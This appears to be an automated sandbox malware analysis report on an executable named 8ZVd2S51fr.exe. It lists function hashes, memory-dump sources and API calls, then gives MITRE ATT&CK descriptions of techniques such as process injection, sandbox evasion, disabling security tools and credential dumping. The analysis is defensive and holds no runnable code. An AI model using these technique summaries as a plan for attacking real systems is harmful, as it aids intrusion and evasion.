Instruction ID: 5a144196806037828d115823008e15df8125562e18d650ad5720593acb5bf40c
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: DC118B75504380DFDB16CF14D5C4B15BBB2FF84314F28C6AAD8498B69AC33AE84ACB61

Function 0086D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088732823.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_86d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0bbd0cf9a4ccb347ac1ddd9291de272aae1b36c686abef1e3f71913f4aad71
Instruction ID: af15f47f232f89ea8d75a51a13abdb3147336e5bff0cc1e2d28337ecddfa7c5e
Opcode Fuzzy Hash: 4e0bbd0cf9a4ccb347ac1ddd9291de272aae1b36c686abef1e3f71913f4aad71
Instruction Fuzzy Hash: C001DB71A093449AE7104E65DCC4B66FFE8FF51324F18C85AED098E296C7799840D6B2

Function 0086D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088732823.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_86d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a70ccfc3d943c13841c5fd735ad47d4f313afd5210b03fa69e2d2121a81c8a4
Instruction ID: 384320df385b10ef1064dc0a8795d9feec6e20e57bb6660d6f552601e529e824
Opcode Fuzzy Hash: 7a70ccfc3d943c13841c5fd735ad47d4f313afd5210b03fa69e2d2121a81c8a4
Instruction Fuzzy Hash: F5F0C2719043449EE7208E06DCC4B62FFA8EF50724F18C45AED088A286C379A840CAB1

Non-executed Functions

Function 06D172B8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dc0100b2451063ee81b3c673c90157f1a6efda067e8821fef58aec18d54c0b9
Instruction ID: 075f03dd49096d4bfc1aab5d9dd5491fde1b3d64281396843e951dd7014ce613
Opcode Fuzzy Hash: 7dc0100b2451063ee81b3c673c90157f1a6efda067e8821fef58aec18d54c0b9
Instruction Fuzzy Hash: 06E13B74E101199FCB14DFA9D5809AEFBF2FF89300F248169D815AB315DB70A982CFA0

Function 06D15230 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4c127ccaed1ca266237eaf7e965805f54b8e07e182d2c550b3dc4c3bcfeb2fe
Instruction ID: 79683a9761941c0233a882fc384921917f9b05c2c5dd41f9d38a50a7ea58846e
Opcode Fuzzy Hash: a4c127ccaed1ca266237eaf7e965805f54b8e07e182d2c550b3dc4c3bcfeb2fe
Instruction Fuzzy Hash: 08E14DB4E001199FDB14DFA8D5809AEFBF2FF89300F248169D815AB355D774A982CFA0

Function 06D16908 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe90d22c173d55e4ee5311808a3b95783f0628d9ff1a4e1553acd854867824f
Instruction ID: 9fe9979c384b73a96dbc97011a77ef6a0d31035e716b292058b5e4fb35637a5f
Opcode Fuzzy Hash: abe90d22c173d55e4ee5311808a3b95783f0628d9ff1a4e1553acd854867824f
Instruction Fuzzy Hash: C9E12974E001599FCB14DFA8D5809AEFBF2FF89304F249169D805AB359DB70A982CF60

Function 009DD51C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089005568.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3939eeba7db5051faf351b896d80259c368d9ff495e318c63d64926c0233d85d
Instruction ID: a64a25e466bf7e3221a70b91b45601d6e73766fb53cb68cf89f25f7cb62f18e1
Opcode Fuzzy Hash: 3939eeba7db5051faf351b896d80259c368d9ff495e318c63d64926c0233d85d
Instruction Fuzzy Hash: F5A15932A40219CFCF05DFA5D8915EEB7B6FF85300B1585BAE806AB365DB35E906CB40

Function 06D195FC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81ffc58f15bf32f59b7838973d0ad29105627adc8c58bb2cb5503f6bd6c47d1
Instruction ID: 8111f281a584168728e275da3915c401205ce3ef1c749bce8370dbe615d1f68e
Opcode Fuzzy Hash: e81ffc58f15bf32f59b7838973d0ad29105627adc8c58bb2cb5503f6bd6c47d1
Instruction Fuzzy Hash: C0B09266E8D008BDAB808D8474310F8F33CC6CB062F403062C69EAF1014190C22501CA

Analysis Process: 8ZVd2S51fr.exePID: 5260, Parent PID: 5452COMMON

Execution Graph

Execution Coverage:	15.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	31
Total number of Limit Nodes:	2

Executed Functions

Function 068C75E8 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,068C74A6), ref: 068C7656

Memory Dump Source

Source File: 00000003.00000002.2337265031.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68c0000_8ZVd2S51fr.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c2912b328dc76136ed1f52e2d432a2b45f0f1914295c0219c79517e95bab62ae
Instruction ID: 652f3fc88e49c217cb81677164f648c29c70ddfd8496015b6df5250459a5bf49
Opcode Fuzzy Hash: c2912b328dc76136ed1f52e2d432a2b45f0f1914295c0219c79517e95bab62ae
Instruction Fuzzy Hash: BB1137B5C006498FDB20DF9AC944ACEFBF9EF88324F14841AD529A7710C375A546CFA5

Function 068C7148 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,068C74A6), ref: 068C7656

Memory Dump Source

Source File: 00000003.00000002.2337265031.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68c0000_8ZVd2S51fr.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5230739dcd5e4dd9fe66b978459ddf1dab841aed166a988ab80189dcee701126
Instruction ID: f89b6bb59213691966986172892d59ec2216883da7869286c413a7ff833ec07e
Opcode Fuzzy Hash: 5230739dcd5e4dd9fe66b978459ddf1dab841aed166a988ab80189dcee701126
Instruction Fuzzy Hash: CB1112B5C006498FCB10DF9AC844A9EFBF8AB88324F14845AD529B7310D375A545CFA5

Function 015D0CE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 015D0D47

Memory Dump Source

Source File: 00000003.00000002.2330257768.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15d0000_8ZVd2S51fr.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 12b9478b954a9ac676b15cefff028d3704707cdb49a4f8a5debac739c70e5546
Instruction ID: 1983b99bebc75e1e16308ce31e4d595f78c25aff62b135c0fbf6d4def1e55ba9
Opcode Fuzzy Hash: 12b9478b954a9ac676b15cefff028d3704707cdb49a4f8a5debac739c70e5546
Instruction Fuzzy Hash: BA1116B5D003498FDB24DFAAD4457EEBBF4AF88324F20881AD419AB250C7796945CFA1

Function 015D0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 015D0D47

Memory Dump Source

Source File: 00000003.00000002.2330257768.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_15d0000_8ZVd2S51fr.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 454d09db8468999be12e0dc79c649e3a5a9a51aedbed79c173aebc16b8ab9051
Instruction ID: 5cbd45152ac3b0883e77bc80b3744ab06346c0bb337ec21212c1c2bb979e2912
Opcode Fuzzy Hash: 454d09db8468999be12e0dc79c649e3a5a9a51aedbed79c173aebc16b8ab9051
Instruction Fuzzy Hash: 7F1136B5D003498FDB20DFAAC44579EFFF4AB48324F20841AD519AB340C779A544CFA5

Function 06911550 Relevance: 1.4, Instructions: 1412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2337337423.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6910000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5a3770fc370f2f07d06d85aae79f44c1be76b5186d0ee23b7071954a7a457c
Instruction ID: 212b29e31d7ae06927a97a7fa54e060677e1b7147a0f88dea438a5f13467a4e5
Opcode Fuzzy Hash: 2e5a3770fc370f2f07d06d85aae79f44c1be76b5186d0ee23b7071954a7a457c
Instruction Fuzzy Hash: 12C26F34B002189FCB55DF68C891EADBBB6FF88700F108099E655AB761CB71AD85CF51

Function 0691349D Relevance: 1.3, Instructions: 1279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2337337423.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6910000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4fb0154b03bdf239c665bd3d0b4e033a49d00bc31dbf1419b206ab185b0c1b0
Instruction ID: 9ca90b14715807e44acd44a1731f49fd91b745bf6f03de6b63574d1da436c58d
Opcode Fuzzy Hash: a4fb0154b03bdf239c665bd3d0b4e033a49d00bc31dbf1419b206ab185b0c1b0
Instruction Fuzzy Hash: 16A1CF74B002098FCB55DF68C895A6EBBF6FF88210B2084AAE516DB7A1CB70DC05CB51

Function 06910048 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2337337423.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6910000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e94b61aa5d2dcee4813d762a7ae79c74ea969458868603c8ebef84aec0fe0122
Instruction ID: c3640101f96192255af850462d1b3c8daac1d1c9bd4274169cfc3d17f258c0dc
Opcode Fuzzy Hash: e94b61aa5d2dcee4813d762a7ae79c74ea969458868603c8ebef84aec0fe0122
Instruction Fuzzy Hash: 45428970700A298FCB28AF68C49056EBBB2FFC5314F114E5DD5129F795CFB6A9058B82

Function 06910002 Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2337337423.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6910000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb4e2037d3a9b59c7a492f092a4d7b622a4ff8da057489040d597cdbb9fae37
Instruction ID: 375b474f1bc7eefe4700a4c4f8c61dd65b00efd636a7d4266ef604daa5337022
Opcode Fuzzy Hash: adb4e2037d3a9b59c7a492f092a4d7b622a4ff8da057489040d597cdbb9fae37
Instruction Fuzzy Hash: E2D18170B04608DFDB458F68C855A6E7BB6FF89304F24845AE5018F7A2CFB29D45CB91

Function 06913138 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2337337423.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6910000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9202e374504dbf7db7e43ca0c3eabb6b86bfe79cb9a3dc57ce783100da19ea8
Instruction ID: 6e946c07ecc756135b5dcf231058abda75575bdfcecc3e6033d7cce9e246f84a
Opcode Fuzzy Hash: f9202e374504dbf7db7e43ca0c3eabb6b86bfe79cb9a3dc57ce783100da19ea8
Instruction Fuzzy Hash: AC917D35B102089FCB44DF69C884A9EBBB6FF89710B2584A9E945AB361DB31EC05CB50

Function 069111A8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2337337423.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6910000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 020c5cf10ce987c985e2e3de76c23a442a84e595bc2dcd1872c96f0a0bd8e172
Instruction ID: 43897d99fa233cbef2d9d76100641106e31ffcb8d05fac78b1f32d3bde778b93
Opcode Fuzzy Hash: 020c5cf10ce987c985e2e3de76c23a442a84e595bc2dcd1872c96f0a0bd8e172
Instruction Fuzzy Hash: 68512931B04609AFCB549F79C88056AF7E9EFC2211B34893ADA05DFA51EB31C947C7A1

Function 0111D054 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2329670494.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_111d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30385c6c62e11f21065f89ce0df2c765f9da3bacc821749cf7e1cdc7f71c8cd
Instruction ID: 89313b209562ae31e5dcd2ae790bde1875ce2c0f018ec1ddcff62fb9f3bb5769
Opcode Fuzzy Hash: d30385c6c62e11f21065f89ce0df2c765f9da3bacc821749cf7e1cdc7f71c8cd
Instruction Fuzzy Hash: 6D21D8B1504240EFDF19DF54E9C4B26FF65FB88314F24C669E9090B25AC336D416CB62

Function 0137D474 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2330054262.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_137d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b49ebc24e541e72877f152664e768fe55c3dc9a48893fc8795d1e0e31854047f
Instruction ID: 10ad81964553d312bb3c9a9db7038ca1890bf378d910d522a75ef92b15077d76
Opcode Fuzzy Hash: b49ebc24e541e72877f152664e768fe55c3dc9a48893fc8795d1e0e31854047f
Instruction Fuzzy Hash: 1A2137B1504204EFCB25DF98C5C0B26BB65FF8832CF24C96DE8094B252C73EE406CA62

Function 0137D2C4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2330054262.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_137d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 392474eac646a299a75f1dca99a13289f2041bb90d4394e1a6f4af3840ff43c7
Instruction ID: 878033b8ae3610dcf061f91235bb6a209c6d953eb68fe612f639e17ed7356e5b
Opcode Fuzzy Hash: 392474eac646a299a75f1dca99a13289f2041bb90d4394e1a6f4af3840ff43c7
Instruction Fuzzy Hash: D92138B1504204EFEB25DF58D5C0B2ABB69FF84328F24C56DD8494B646C33ED446CAB1

Function 0111D04F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2329670494.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_111d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad2dec59e3151889acede25dbdc09f1e0996748c90a37620c8196c664727292b
Instruction ID: b6fe2f2578d416423a9eeccc6095bfbfd898a96274525efb053aa2cfc2cd7d9e
Opcode Fuzzy Hash: ad2dec59e3151889acede25dbdc09f1e0996748c90a37620c8196c664727292b
Instruction Fuzzy Hash: C621CD72504280DFCF1ACF54E9C4B16BF72FB88314F2486A9D9480A25AC33AD426CB91

Function 0137D2BF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2330054262.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_137d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
Instruction ID: b2d3b8226f4030e53897cc6dc24904917d38594301c088d0e286c2e07ce4fd5d
Opcode Fuzzy Hash: 6571a979d86382cef3f3a0ee6dcd591210bcaba3c37dfea3d6794a8d99f67603
Instruction Fuzzy Hash: EC11B275504680CFDB12CF14D5C4B19FF61FB84328F28C6AAD8494B656C33AD44ACBA1

Function 0137D46F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2330054262.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_137d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: 4dbf959a6cf8226f3d0ffefbc69055c2a230a882eecc33319f9c385b5a9100c7
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: B9119D75504280DFDB16CF58D5C4B15BFB2FF88328F28C6AAD8494B656C33AD44ACB62

Function 0111DAA9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2329670494.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_111d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7706edec6775bba675fff9d82caec28b95afd5cb8024ec74f20f7a0a50c4ea04
Instruction ID: 42a8dc6bf314acd4c65dcbb4382c528e23eef0602aa45672b861a5f574666a3a
Opcode Fuzzy Hash: 7706edec6775bba675fff9d82caec28b95afd5cb8024ec74f20f7a0a50c4ea04
Instruction Fuzzy Hash: 0F01D0721083409AEF198AA9FCC8757FFACEF41374F18C566ED494A286C7799840C776

Function 0111DAA8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2329670494.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_111d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb4b872acbefedd83915c75394ee7502714f0553b75229c559de43c91244c36e
Instruction ID: f31c478c4be28f9e3e02c271a06dde9b6740f77e0ceb9075aac1b5537c0fe02c
Opcode Fuzzy Hash: cb4b872acbefedd83915c75394ee7502714f0553b75229c559de43c91244c36e
Instruction Fuzzy Hash: 0AF0C2714043409AEB258A5AECC8B62FFA8EB42224F18C05AED494B286C3799840CBB1

Non-executed Functions

Function 06910D50 Relevance: 10.3, Strings: 8, Instructions: 296COMMON

Download Yara Rule

Strings

$sq, xrefs: 06910E42
$sq, xrefs: 06910DCC
$sq, xrefs: 06910F76
$sq, xrefs: 06910F50
$sq, xrefs: 06910E1C
$sq, xrefs: 06910E4E
$sq, xrefs: 06910F00
$sq, xrefs: 06910F82

Memory Dump Source

Source File: 00000003.00000002.2337337423.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6910000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID: $sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
API String ID: 0-3003498
Opcode ID: d75286ac35b1aa948243b4016ab3b2e126268f83f019d2045105390466e46d07
Instruction ID: c17a913ef27e681e77bef0bd0ff2a8e2669bc0d13b3e3fbf8c6bdf58024b0bad
Opcode Fuzzy Hash: d75286ac35b1aa948243b4016ab3b2e126268f83f019d2045105390466e46d07
Instruction Fuzzy Hash: BEB1B230B002099FDB59DB69C94497EBBF6BFC8200B24846AE516DB751CF32DD85CB90

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
